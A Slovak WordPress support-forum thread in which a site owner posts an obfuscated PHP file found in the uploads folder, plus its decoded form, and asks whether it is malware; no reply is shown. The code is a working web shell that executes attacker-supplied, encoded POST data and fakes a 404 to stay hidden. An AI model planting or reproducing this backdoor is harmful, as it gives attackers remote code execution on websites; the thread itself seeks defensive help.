Podpora » Pomoc a podpora » Je to malware ?

  • Ahojte,

    v zložke /www_root/wp-content/uploads/js_composer mám divný súbor thumbs_img.php a jeho obsah je zakódovaný:

    <?php
    
    if(isset($_POST[chr(100)."a"."\x74"."\x61"])){$ohx=chr(97)."s".chr(115).chr(101)."\x72"."t";$twu="b".chr(97)."\x73"."\x65"."6".chr(52)."\x5f"."d".chr(101)."c"."\x6f"."d"."\x65";$ye="s"."t"."\x72"."\x5f"."r"."\x6f"."t"."1".chr(51);@$ohx(@$twu(@$ye($_POST[chr(100)."a"."\x74"."\x61"])));die;}
    else{
    	if(function_exists('headers_sent') && !headers_sent()){
    		header('HTTP/1.0 404 Not Found',TRUE);
    		header('Status: 404 Not Found',TRUE);
    	}
    }
    
    ?>

    po decryptovaní je takýto:

    if(isset($_POST["data"])){$ohx="assert";$twu="base64_decode";$ye="str_rot13";@$ohx(@$twu(@$ye($_POST["data"])));die;}
    else{
    	if(function_exists('headers_sent') && !headers_sent()){
    		header('HTTP/1.0 404 Not Found',TRUE);
    		header('Status: 404 Not Found',TRUE);
    	}
    }

    je to malware alebo normálny kód ?

  • Téma ‘Je to malware ?’ uzatvorená pre ďalšie odpovede.